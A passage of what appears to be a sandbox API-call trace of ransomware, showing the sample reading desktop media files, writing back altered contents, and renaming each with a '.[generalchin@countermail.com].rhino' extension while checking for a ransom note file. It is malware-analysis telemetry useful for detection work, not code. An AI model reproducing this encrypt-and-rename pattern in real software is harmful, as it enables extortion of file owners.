returned 0x6eee00 [0078.116] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ee498 | out: hHeap=0x6d0000) returned 1 [0078.116] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x6efc18 [0078.116] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eee00 | out: hHeap=0x6d0000) returned 1 [0078.116] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x715898 [0078.116] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6efc18 | out: hHeap=0x6d0000) returned 1 [0078.116] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x6ee498 [0078.116] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715898 | out: hHeap=0x6d0000) returned 1 [0078.118] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x715898 [0078.119] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ee498 | out: hHeap=0x6d0000) returned 1 [0078.119] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x75bbb8 [0078.120] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715898 | out: hHeap=0x6d0000) returned 1 [0078.120] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa028) returned 0x762698 [0078.121] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75bbb8 | out: hHeap=0x6d0000) returned 1 [0078.121] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf02a) returned 0x76c6c8 [0078.121] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x762698 | out: hHeap=0x6d0000) returned 1 [0078.122] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1682d) returned 0x77b700 [0078.122] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x76c6c8 | out: hHeap=0x6d0000) returned 1 [0078.123] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x21c32) returned 0x791f38 [0078.124] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77b700 | out: hHeap=0x6d0000) returned 1 [0078.124] WriteFile (in: hFile=0x124, lpBuffer=0x791f40*, nNumberOfBytesToWrite=0x16fcf, lpNumberOfBytesWritten=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x791f40*, lpNumberOfBytesWritten=0x4af2ac*=0x16fcf, lpOverlapped=0x0) returned 1 [0078.125] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x791f38 | out: hHeap=0x6d0000) returned 1 [0078.125] UnlockFile (hFile=0x124, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x16fcf, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0078.125] CloseHandle (hObject=0x124) returned 1 [0078.129] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6eb8f0 [0078.129] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x6f36d0 [0078.129] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eb8f0 | out: hHeap=0x6d0000) returned 1 [0078.129] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\833tdY5_MH34U4.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\833tdy5_mh34u4.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\833tdY5_MH34U4.mp3.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\833tdy5_mh34u4.mp3.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0078.131] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0078.131] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703f80 | out: hHeap=0x6d0000) returned 1 [0078.131] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x744cd8 | out: hHeap=0x6d0000) returned 1 [0078.131] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f6970 [0078.131] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f69c8 | out: hHeap=0x6d0000) returned 1 [0078.131] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f69c8 [0078.131] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6eb8f0 [0078.131] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f69c8 | out: hHeap=0x6d0000) returned 1 [0078.131] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0078.131] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eb8f0 | out: hHeap=0x6d0000) returned 1 [0078.131] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CXFgyYpve1g93yz.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cxfgyypve1g93yz.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0078.131] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x4af30c | out: lpFileSizeHigh=0x4af30c*=0x0) returned 0x1711f [0078.131] LockFile (hFile=0x124, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x1723f, nNumberOfBytesToLockHigh=0x0) returned 1 [0078.131] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.131] ReadFile (in: hFile=0x124, lpBuffer=0x4af2cc, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x4af2cc*, lpNumberOfBytesRead=0x4af2ac*=0x20, lpOverlapped=0x0) returned 1 [0078.132] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.133] ReadFile (in: hFile=0x124, lpBuffer=0x3110040, nNumberOfBytesToRead=0x1711f, lpNumberOfBytesRead=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x3110040*, lpNumberOfBytesRead=0x4af2ac*=0x1711f, lpOverlapped=0x0) returned 1 [0078.133] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5760 [0078.134] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0078.134] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x715080 [0078.134] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e6b00 [0078.134] GetLastError () returned 0x0 [0078.134] SetLastError (dwErrCode=0x0) [0078.134] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0078.134] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x17142) returned 0x744cd8 [0078.134] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6b00 | out: hHeap=0x6d0000) returned 1 [0078.134] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x703e78 [0078.134] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x703f80 [0078.134] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0078.134] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.135] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x6f5760 [0078.135] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x6f5750 [0078.135] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0078.135] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x6f5760 [0078.135] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5750 | out: hHeap=0x6d0000) returned 1 [0078.135] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5750 [0078.135] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0078.135] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x6f5760 [0078.135] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5750 | out: hHeap=0x6d0000) returned 1 [0078.135] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x714170 [0078.135] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0078.135] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x714188 [0078.135] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714170 | out: hHeap=0x6d0000) returned 1 [0078.135] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709f08 [0078.135] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714188 | out: hHeap=0x6d0000) returned 1 [0078.135] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x713d48 [0078.135] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709f08 | out: hHeap=0x6d0000) returned 1 [0078.135] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x715080 [0078.135] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713d48 | out: hHeap=0x6d0000) returned 1 [0078.135] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e6b00 [0078.135] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0078.135] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x6f36d0 [0078.135] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6b00 | out: hHeap=0x6d0000) returned 1 [0078.135] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x703e78 [0078.135] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0078.135] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x721c20 [0078.135] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0078.135] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x721d00 [0078.136] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721c20 | out: hHeap=0x6d0000) returned 1 [0078.136] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x714b90 [0078.136] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721d00 | out: hHeap=0x6d0000) returned 1 [0078.136] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x721c20 [0078.136] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714b90 | out: hHeap=0x6d0000) returned 1 [0078.136] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x6f2da0 [0078.136] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721c20 | out: hHeap=0x6d0000) returned 1 [0078.136] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x6f45b8 [0078.136] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f2da0 | out: hHeap=0x6d0000) returned 1 [0078.136] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x6ee498 [0078.136] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f45b8 | out: hHeap=0x6d0000) returned 1 [0078.136] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x6eee00 [0078.136] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ee498 | out: hHeap=0x6d0000) returned 1 [0078.136] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x6efc18 [0078.136] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eee00 | out: hHeap=0x6d0000) returned 1 [0078.136] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x715898 [0078.136] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6efc18 | out: hHeap=0x6d0000) returned 1 [0078.136] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x6ee498 [0078.136] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715898 | out: hHeap=0x6d0000) returned 1 [0078.138] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x715898 [0078.139] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ee498 | out: hHeap=0x6d0000) returned 1 [0078.139] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x75be28 [0078.140] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715898 | out: hHeap=0x6d0000) returned 1 [0078.141] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa028) returned 0x762908 [0078.141] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75be28 | out: hHeap=0x6d0000) returned 1 [0078.141] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf02a) returned 0x76c938 [0078.142] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x762908 | out: hHeap=0x6d0000) returned 1 [0078.142] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1682d) returned 0x77b970 [0078.313] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x76c938 | out: hHeap=0x6d0000) returned 1 [0078.314] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x21c32) returned 0x7921a8 [0078.315] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77b970 | out: hHeap=0x6d0000) returned 1 [0078.316] WriteFile (in: hFile=0x124, lpBuffer=0x7921c0*, nNumberOfBytesToWrite=0x1723f, lpNumberOfBytesWritten=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x7921c0*, lpNumberOfBytesWritten=0x4af2ac*=0x1723f, lpOverlapped=0x0) returned 1 [0078.316] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7921a8 | out: hHeap=0x6d0000) returned 1 [0078.316] UnlockFile (hFile=0x124, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x1723f, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0078.316] CloseHandle (hObject=0x124) returned 1 [0078.321] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6eb8f0 [0078.321] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x6f36d0 [0078.321] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eb8f0 | out: hHeap=0x6d0000) returned 1 [0078.321] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CXFgyYpve1g93yz.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cxfgyypve1g93yz.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CXFgyYpve1g93yz.wav.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cxfgyypve1g93yz.wav.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0078.323] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0078.323] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703f80 | out: hHeap=0x6d0000) returned 1 [0078.323] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x744cd8 | out: hHeap=0x6d0000) returned 1 [0078.323] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f69c8 [0078.323] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f6970 | out: hHeap=0x6d0000) returned 1 [0078.323] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f6970 [0078.323] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6eb8f0 [0078.323] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f6970 | out: hHeap=0x6d0000) returned 1 [0078.323] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0078.323] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eb8f0 | out: hHeap=0x6d0000) returned 1 [0078.323] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CZ823cDl.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cz823cdl.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0078.323] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x4af30c | out: lpFileSizeHigh=0x4af30c*=0x0) returned 0x3b85 [0078.323] LockFile (hFile=0x124, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x3ca5, nNumberOfBytesToLockHigh=0x0) returned 1 [0078.323] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.324] ReadFile (in: hFile=0x124, lpBuffer=0x4af2cc, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x4af2cc*, lpNumberOfBytesRead=0x4af2ac*=0x20, lpOverlapped=0x0) returned 1 [0078.325] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.325] ReadFile (in: hFile=0x124, lpBuffer=0x3110040, nNumberOfBytesToRead=0x3b85, lpNumberOfBytesRead=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x3110040*, lpNumberOfBytesRead=0x4af2ac*=0x3b85, lpOverlapped=0x0) returned 1 [0078.325] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5760 [0078.325] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0078.325] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x715080 [0078.325] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e6b00 [0078.326] GetLastError () returned 0x0 [0078.326] SetLastError (dwErrCode=0x0) [0078.326] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0078.326] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3ba8) returned 0x715898 [0078.326] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6b00 | out: hHeap=0x6d0000) returned 1 [0078.326] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x703e78 [0078.326] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x703f80 [0078.326] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0078.326] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.326] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x6f5760 [0078.326] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x6f5750 [0078.326] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0078.326] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x6f5760 [0078.326] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5750 | out: hHeap=0x6d0000) returned 1 [0078.326] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5750 [0078.326] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0078.326] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x6f5760 [0078.326] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5750 | out: hHeap=0x6d0000) returned 1 [0078.326] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x714188 [0078.326] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0078.326] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x714170 [0078.326] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714188 | out: hHeap=0x6d0000) returned 1 [0078.326] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709f08 [0078.327] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714170 | out: hHeap=0x6d0000) returned 1 [0078.327] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x713d48 [0078.327] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709f08 | out: hHeap=0x6d0000) returned 1 [0078.327] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x715080 [0078.327] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713d48 | out: hHeap=0x6d0000) returned 1 [0078.327] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e6b00 [0078.327] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0078.327] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x6f36d0 [0078.327] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6b00 | out: hHeap=0x6d0000) returned 1 [0078.327] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x703e78 [0078.327] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0078.327] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x721c20 [0078.327] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0078.327] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x721d00 [0078.327] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721c20 | out: hHeap=0x6d0000) returned 1 [0078.327] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x714b90 [0078.327] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721d00 | out: hHeap=0x6d0000) returned 1 [0078.327] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x721c20 [0078.327] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714b90 | out: hHeap=0x6d0000) returned 1 [0078.327] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x6f2da0 [0078.327] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721c20 | out: hHeap=0x6d0000) returned 1 [0078.327] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x6f45b8 [0078.327] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f2da0 | out: hHeap=0x6d0000) returned 1 [0078.327] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x719448 [0078.328] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f45b8 | out: hHeap=0x6d0000) returned 1 [0078.328] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x6ee498 [0078.328] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x719448 | out: hHeap=0x6d0000) returned 1 [0078.328] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x6ef2b0 [0078.328] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ee498 | out: hHeap=0x6d0000) returned 1 [0078.328] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x744cd8 [0078.328] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ef2b0 | out: hHeap=0x6d0000) returned 1 [0078.328] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x6ee498 [0078.328] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x744cd8 | out: hHeap=0x6d0000) returned 1 [0078.328] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x744cd8 [0078.328] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ee498 | out: hHeap=0x6d0000) returned 1 [0078.328] WriteFile (in: hFile=0x124, lpBuffer=0x744ce0*, nNumberOfBytesToWrite=0x3ca5, lpNumberOfBytesWritten=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x744ce0*, lpNumberOfBytesWritten=0x4af2ac*=0x3ca5, lpOverlapped=0x0) returned 1 [0078.328] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x744cd8 | out: hHeap=0x6d0000) returned 1 [0078.328] UnlockFile (hFile=0x124, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x3ca5, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0078.328] CloseHandle (hObject=0x124) returned 1 [0078.333] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x70) returned 0x6fabf0 [0078.333] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e9730 [0078.333] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6fabf0 | out: hHeap=0x6d0000) returned 1 [0078.333] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CZ823cDl.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cz823cdl.mp4"), 